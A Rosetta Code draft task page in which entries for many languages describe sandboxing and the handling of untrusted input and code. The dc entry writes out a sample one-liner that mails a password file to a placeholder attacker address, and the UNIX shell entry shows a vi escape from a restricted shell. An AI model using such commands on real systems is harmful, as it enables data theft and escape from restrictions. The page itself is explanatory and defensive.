Untrusted environment

From Rosetta Code
Untrusted environment is a draft programming task. It is not yet considered ready to be promoted as a complete task, for reasons that should be found in its talk page.

Sometimes it is useful to run code with inputs from untrusted users, untrusted code, etc. Explain and demonstrate the features your language uses for dealing with untrusted input and untrusted code. Explain possible compromises, weaknesses and exploits that may be available through the language (for example forcing execution of something outside of the application) as a result of using untrusted data sources.

The intention is that the definition is to be interpreted broadly; different languages will solve this task in very different ways and with (generally) incomparable results.

6502 Assembly

Translation of: Z80 Assembly

There is no trusted mode on the 6502. The program counter executes whatever it sees, and there are no segfaults, page faults, or what have you. Arbitrary code execution can be a risk, but can also be used by the programmer to speed up certain tasks, allow for opcodes an assembler doesn't support, etc.

68000 Assembly

The original 68000 has a "Supervisor Mode" and a "User Mode." There is little difference between the two except that Supervisor Mode has a separate stack pointer and allows certain commands that modify the full 16-bit processor status register as opposed to just the low byte of the status register. However, there is very little in protection from arbitrary code execution, as there is no way to prevent executing code from RAM. Whatever the program counter sees is what it executes, regardless of whether it should.

8080 Assembly

Translation of: Z80 Assembly

There is no trusted mode on the 8080. The program counter executes whatever it sees, and there are no segfaults, page faults, or what have you. Arbitrary code execution can be a risk, but can also be used by the programmer to speed up certain tasks, allow for opcodes an assembler doesn't support, etc. Some machines even require arbitrary code execution to properly function, such as the Game Boy, which must jump to internal RAM in order to use direct memory access to quickly display hardware sprites.

C

C is a double edged sword. It was designed to allow programmers to do virtually anything and everything. The aim was as a high level language to be close as possible at the computer hardware (CPU and memory). This gives the property of C to being fast. Therefore its possible to write large parts for Operating Systems with it. The ability to access memory at the bit level, embed assembly directly and yet be readable ( or unreadable ) by humans, resulted in a language which forms the foundation of the world as we know it.

In other words, there is no check. Users and programmers can do anything they want. There is no sandbox, no off-limits area. Unless it is explicitly forbidden by the compiler or the operating system, a C program without sufficient and necessary checks will result in 'unintended and unforeseen' consequences with the 'appropriate' inputs.

On the bright side, programming in C disciplines the programmer, nothing like a grueling boot camp or war time conscription to make one appreciate the niceties of a Java, Perl, Python or Haskell.

But try writing an operating system with them...

With great power, comes great responsibility. :)

dc

Beware of allowing user input to fed to the reverse polish calculator. It has the ability to run shell commands, and this could be a security risk:

`!'cat /etc/password|mail badguy@hackersrus.com

FreeBASIC

FreeBASIC does not have built-in functions specifically designed to handle untrusted input or code. However, there are general practices that can be followed to mitigate the risks associated with untrusted input:

  1. Input Validation: Always validate user input before using it. This can help prevent issues like SQL injection, buffer overflow, etc.
  2. Prevent execution of untrusted code: FreeBASIC does not have a function to execute code dynamically (such as eval in JavaScript). But this is a good thing from a security point of view, as it reduces the risk of arbitrary code execution.
  3. Error Handling: Always include error handling in your code. This can prevent unexpected behavior and give you more control over what happens when an error occurs.
  4. Limiting system access: Be careful when using system-level commands (such as SHELL). These can potentially be exploited to execute arbitrary commands on the host system.
  5. Safe Libraries and Functions: Use libraries and functions that are known to be safe. Avoid using outdated or insecure features.

Go

Go is generally a safe language. In particular, whilst pointers are supported, arithmetic on them is not and so it's not possible to use pointers to poke around within the language's internal structures or to point to arbitrary memory locations.

However, there are occasions (usually for performance reasons or to do things which - whilst desirable - wouldn't otherwise be possible) when pointer arithmetic is needed and Go provides the 'unsafe' package for these occasions.

This package contains functions which allow one to determine the size/alignment of various entities and the offset of particular fields within a struct as well as to perform pointer arithmetic.

The following example shows how to use a combination of reflection and pointer arithmetic to indirectly (and unsafely) change the contents of a byte slice.

package main

import (
    "fmt"
    "reflect"
    "unsafe"
)

func main() {
    bs := []byte("Hello world!")
    fmt.Println(string(bs))
    g := "globe"
    hdr := (*reflect.SliceHeader)(unsafe.Pointer(&bs))
    for i := 0; i < 5; i++ {
        data := (*byte)(unsafe.Pointer(hdr.Data + uintptr(i) + 6))
        *data = g[i]
    }
    fmt.Println(string(bs))
}
Output:
Hello world!
Hello globe!

J

J has some security mechanisms built in, and they are detailed below. But to understand their scope (and limitations), it's probably helpful to provide some context first.

J is a function-level language, expressed with composition of primitive words, like + for plus and ! for factorial and @ for function-composition and / for reduce, etc.

Because J is also (mostly) functional, almost all of these primitive words are also "native": that is, they stay within the bounds of the execution environment, and cannot reach outside of it to the host system. They cannot even effect J's own memory space, except through assigning variables.

In fact, there is only one word which can reach outside the execution environment (the functional scope of the program): !:, the aptly named "foreign" operator. This one operator encapsulates all access to the outside world, and even the "behind the scenes world" of J's own memory space.

The operator takes two arguments and derives a function, which specifies which kind of foreign interface you want. For example, 1!:1 is the specific function to read a file, and 1!:2 is the function to write one (as in 1!:1 'filename' and some_data 1!:2 'filename', respectively). The foreign function 15!:0 allows the J programmer to call a shared library (dll, so, dylib, etc), 2!:5 reads environment variables (e.g. 2!:5'PATH'), and 2!:55 will terminate the program (quit, die: the mnemonic is that 255 is the "last" value of a byte, and 2!:55 is the "last" thing you want to do in a J program). There are many more, grouped into families (the first argument to !: specifies which family you want, e.g. 1!:n is the file family, and 1!:1 is specifically the file read function).

But the key thing is that this one operator, !:, controls all the dangerous stuff, so if we want to prevent dangerous stuff, we only have to put guards in one place. And, in fact, we have "foreign controls": foreign functions which themselves control which foreign functions are allowed. In other words, there's only one "door" to J, and we can lock it.

From the J documentation:

9!:25 y Security Level: The security level is either 0 or 1. It is initially 0, and may be set to 1 (and can not be reset to 0). When the security level is 1, executing Window driver commands and certain foreigns (!:) that can alter the external state cause a “security violation” error to be signalled. The following foreigns are prohibited: dyads 0!:n , 1!:n except 1!:40 , 1!:41, and 1!:42 , 2!:n , and 16!:n .

There are further foreign controls on how much space, or time, a single execution is allowed to take:

9!:33 y Execution Time Limit: The execution time limit is a single non-negative (possibly non-integral) number of seconds. The limit is reduced for every line of immediate execution that exceeds a minimum granularity, and execution is interrupted with a “time limit error” if a non-zero limit is set and goes to 0.
9!:21 y Memory Limit: An upper bound on the size of any one memory allocation. The memory limit is initially 2^30 on 32-bit systems and 2^62 on 64-bit systems.

With all that said, the language has seen limited use in contexts where code injection is a concern, so these mechanisms are rarely exercised (and somewhat dated).

Kotlin

Kotlin/JVM, which compiles to bytecode rather than to native code, has the same security features as other languages which target the Java Platform.

In particular the JVM verifies the bytecode to ensure that it cannot branch to invalid locations or address memory outside the bounds of an array. Pointer arithmetic is disallowed as are unchecked type casts.

The JVM also automatically allocates memory for new objects and deallocates memory for objects which are no longer needed using a garbage collector. Manual memory management is not supported.

It is possible to run untrusted bytecode within a 'sandbox' which prevents it from interfering with the underlying environment. However, programs can also be cryptographically signed by a recognized authority and users can then allow such programs to be run within a trusted environment.

Of course, no system is perfect and a number of vulnerabilities have been discovered in these mechanisms over the years and will doubtless continue to be discovered in the future given the ubiquity of the Java Platform and hence its attractiveness to hackers.

Lua

Lua supports protected calls and custom environments. Details have changed through various versions, and the specifics can become quite involved if/as needed, however the following might suffice as a simple example for Lua 5.2 or 5.3.

local untrusted = [[
  print("hello") -- safe
  for i = 1, 7 do print(i, i*i) end -- safe
  setmetatable(_G, malicious) -- unsafe
]]
sandbox = { print=print }
local ret, msg = pcall(load(untrusted,nil,nil,sandbox))
print("ret, msg:", ret, msg)
Output:
hello
1       1
2       4
3       9
4       16
5       25
6       36
7       49
ret, msg:        false   [string "  print("hello")..."]:3: attempt to call global 'setmetatable' (a nil value)

Nim

Nim can compile to native code (via C, C++ or Objective-C) or to Javascript. When compiling to native code, as other languages such as Ada, it includes checks to insure than code is safe.

So, in release mode which is the mode to prefer, assignments , indexing, accesses via references, overflows ar checked. So, for instance, in normal code there is no way to get a buffer overflow as this would raise an IndexDefect exception.

Nim insures (except if explicitly specified otherwise) that memory is initialized with binary zeros, which avoids random behaviors. That means also that all pointers and references are initialized to nil which will avoid undefined behavior when dereferencing a non explicitly initialized pointer.

Nim uses copy semantic which means that assignments always copy the value and not the address. This avoids aliasing which is unsafe, but this may produce less efficient code. Fortunately, the compiler is smart enough to avoid most of the copies. Nevertheless, the programmer should be aware of this and take care of that.

The compiler does many checks to detect possible violation of memory safety. All is done to make sure that, unless explicitly required, no memory corruption is possible.

However, as a system language, Nim allows to do unsafe operations. These operations are unsafe:

– calling an external procedure (typically using C interface);

– converting from a type to another type using a cast (but normal conversions are safe);

– using pointers (allocating memory, dereferencing, freeing memory); but references are safe as all is managed by the GC;

– taking the address of an object (which means in fact to use pointers).

There is no simple way to do arithmetic operations on addresses. This is of course possible using casts between addresses/pointers and integers but this is almost never necessary.

Nim allows to deactivate and reactivate checks in some zones using pragmas. It allows also to remove almost all checks by using option -d:danger when compiling. In this mode, the code is the most efficient, but at the price of safety.

PARI/GP

GP has a default, secure, which disallows the system and extern commands. Once activated this default cannot be removed without input from the user (i.e., not a script).

default(secure,1);
system("del file.txt");
default(secure,0); \\ Ineffective without user input

Perl

Perl can be invoked in taint mode with the command line option -T. While in this mode input from the user, and all variables derived from it, cannot be used in certain contexts until 'sanitized' by being passed through a regular expression.

#!/usr/bin/perl -T
my $f = $ARGV[0];
open FILE, ">$f" or die 'Cannot open file for writing';
print FILE "Modifying an arbitrary file\n";
close FILE;

Phix

with safe_mode disables most potentially dangerous features such as file i/o, and invoking c_func/proc() or using inline assembly outside of Phix\builtins\, which should make it safer to try out code from an untrusted source. It behaves identically to a -safe command line option, however relying on the latter risks leaving a dangerous file lying around that might accidentally be run without the proper command line flag in some idle moment much later, whereas of course if you put it in the source, that's not such an issue.

-- demo\rosetta\safe_mode.exw
--
-- (distributed version has several more similar scraps,
--  this is just enough to give you the basic flavour.)
--
with javascript_semantics -- (erm, it kinda is anyway...)
with safe_mode

sequence cl = command_line()
?cl
if find_any({"-safe","--safe"},cl) then ?9/0 end if

-- disallow inline assembly (at compile time):
--#ilASM{ mov eax,1 }
-- The above would be rejected outright by pwa/p2js anyway, with or without safe_mode

Note that builtins\VM\pDiagN.e has to switch it off (eg to write an ex.err file when the program crashes), which is trivial to do but only via #ilASM{}, so a malicious programmer simply cannot, that is, as long as you actually use safe_mode, and don't ever put untrusted code into the builtins\ directory. Special allowances are made for mpfr.e (aka gmp) and pGUI.e (aka IUP), since they're not inherently dangerous; there might be some other libraries that deserve similar treatment.

As mentioned above, "with javascript_semantics" is itself a kind of safe mode anyway, that is if you run it in a browser, but it won't help in any way to stop the same file doing rude things should it be run on desktop/Phix.

Standard disclaimer applies:
Everything this relies on was added for this task in less than 24 hours.
In no way do I even begin to think this is secure or complete, but just yesterday (at the time of writing) it was 100% totally insecure: there was no "with safe_mode" option, no -safe command line option, nothing at all to check or even store that option in the compiler, or runtime. Should you want this to be improved, simply add more tests to demo\rosetta\safe_mode.exw, and obviously complain if/should they not entirely meet your expectations.

Racket

The racket/sandbox library provides a way to construct limited evaluators which are prohibited from using too much time, memory, read/write/execute files, using the network, etc.

#lang racket
(require racket/sandbox)
(define e (make-evaluator 'racket))
(e '(...unsafe code...))

The idea is that a default sandbox is suitable for running arbitrary code without any of the usual risks. The library can also be used with many different configurations, to lift some of the restriction, which is more fitting in different cases.

Raku

(formerly Perl 6) Raku doesn't really provide a high security mode for untrusted environments. By default, Raku is sort of a walled garden. It is difficult to access memory directly, especially in locations not controlled by the Raku interpreter, so unauthorized memory access is unlikely to be a threat with default Raku commands and capabilities.

It is possible (and quite easy) to run Raku with a restricted setting which will disable many IO commands that can be used to access or modify things outside of the Raku interpreter. However, a determined bad actor could theoretically work around the restrictions, especially if the nativecall interface is available. The nativecall interface allows directly calling in to and executing code from C libraries so anything possible in C is now possible in Raku. This is great for all of the power it provides, but along with that comes the responsibility and inherent security risk.

Really, if you want to lock down a Raku instance so it is "safe" for unauthenticated, untrusted, general access, you are better off running it in some kind of locked down virtual machine or sandbox managed by the operating system rather than trying to build an ad hoc "safe" environment.

REXX

Details for Regina REXX.

REXX is designed to assist in system scripting. Normally any command that is not a REXX instruction or user added command is passed to the operating system or default ADDRESS for evaluation.

Regina includes a RESTRICTED mode. This disables

  • LINEOUT, CHAROUT, POPEN, RXFUNCADD BIFs
  • "OPEN WRITE", "OPEN BOTH" subcommands of STREAM BIF
  • The "built-in" environments eg. SYSTEM, CMD or PATH of ADDRESS command
  • Setting the value of a variable in the external environment with VALUE BIF.
  • Calling external functions

This mode is started from the command line with the -r option. When embedding Regina for use with application scripting the RexsStart API can have the RXRESTRICTED bit set in the CallType field.

By the way, BIF is short for Built In Function.

For example, given cat.rexx:

ADDRESS SYSTEM 'cat cat.rexx'
Output:
prompt$ regina cat.rexx
ADDRESS SYSTEM 'cat cat.rexx'
prompt$ regina -r cat.rexx
     1 +++ ADDRESS SYSTEM 'cat cat.rexx'
Error 95 running "/home/user/lang/rexx/cat.rexx", line 1: [Restricted feature used in "safe" mode]
Error 95.5: [Running external commands invalid in "safe" mode]

Ruby

Ruby handles untrusted input with the global variable $SAFE. Settings higher than 0 invoke an increasing level of sandboxing and general paranoia.

require 'cgi'
$SAFE = 4
cgi = CGI::new("html4")
eval(cgi["arbitrary_input"].to_s)

Rust

While Rust does not have a sandboxed execution mode of its own, it has some of the best support available for compiling to WebAssembly, which is explicitly designed to be sandboxed and has multiple runtime environments in development.

Scala

Talking about high-level computer programming languages, they aim to address problems in a user domain rather than problems close to the machine as assembly languages do. The machine is already shielded by this aim and prevents the programmer from irrelevant machine details. A high-level language has in respect with an assembler no 'right on the bare silicon' programmers nor memory model.

Another objective of a high-level language is to be platform-independent and consequently being machine-independent. Scala is supported for the following target platforms:

  • the JVM 'Write once, run anywhere' platform,
  • embedded and mostly sandboxed ECMAScript (JavaScript) engines (internet browser, Node.js),
  • on the Microsoft .Net platform (obsolete)
  • Scala Native for the LLVM infrastructure (generates machine-code)


Each of these target platforms, and subsequently the operating system, has its own specific vulnerabilities and countermeasures.

It's better to solve the problems there where they arise.

Tcl

Tcl allows evaluation of untrusted code through safe interpreters, which are evaluation contexts where all unsafe operations are removed. This includes access to the filesystem, access to environment variables, the opening of sockets, description of the platform, etc.

set context [interp create -safe]
$context eval $untrustedCode

Because the only way that Tcl code can perform an operation is by invoking a command if that command is not present in the execution context then the functionality is gone.

It is possible to profile in restricted versions of operations to allow things like access to built-in packages.

set context [safe::interpCreate]
$context eval $untrustedCode

These work by installing aliases from the otherwise-removed commands in the safe interpreter to implementations of the commands in the parent master interpreter that take care to restrict what can be accessed. Note that the majority of unsafe operations are still not present, and the paths supported to the packages are virtualized; no hole is opened up for performing unsafe operations unless a package author is deliberately careless in their C implementation.

UNIX Shell

Enclose variable references in double quotes

Variable references should be contained in double quotes to prevent an empty string causing an error as a result of omission during evaluation:

# num=`expr $num + 1` # This may error if num is an empty string
num=`expr "$num" + 1` # The quotes are an improvement

Do not allow users to run programs that can launch a new shell

Traditional Unix provides a restricted mode shell (rsh) that does not allow the following operations:

  • changing directory
  • specifying absolute pathnames or names containing a slash
  • setting the PATH or SHELL variable
  • redirection of output

However, the restricted shell is not completely secure. A user can break out of the restricted environment by running a program that features a shell function. The following is an example of the shell function in vi being used to escape from the restricted shell:

vi
:set shell=/bin/sh
:shell

Use a chroot jail

Sometimes chroot jails are used to add a layer of security to

mkdir ~/jail
cd ~/jail;
chroot ~/jail;
setuid(9); # if 9 is the userid of a non-root user
rm /etc/hosts # actually points to ~/jail/etc/hosts

Wren

Wren code is effectively sand-boxed by its VM, is limited in what it can do and is therefore pretty safe in itself.

However, it has no way of telling whether any input is from an untrusted source except that, when it is being embedded, input can only arrive via the host application which is therefore responsible for checking its authenticity.

A possible vulnerability is that Wren modules are always imported in source code rather than binary form and there is no 'signing' mechanism. It would therefore be possible for someone to replace a 'bona fide' module with a malicious one without either Wren's VM or the host application realizing this had been done.

Z80 Assembly

There is no trusted mode on the Z80. The program counter executes whatever it sees, and there are no segfaults, page faults, or what have you. Arbitrary code execution can be a risk, but can also be used by the programmer to speed up certain tasks, allow for opcodes an assembler doesn't support, etc. Some machines even require arbitrary code execution to properly function, such as the Game Boy, which must jump to internal RAM in order to use direct memory access to quickly display hardware sprites.

zkl

Basically, there is no trusted mode. If the OS lets you do it, you can. This means internet access, file system examination/modification, forking processes, pulling in arbitrary source code, compiling and running it, etc.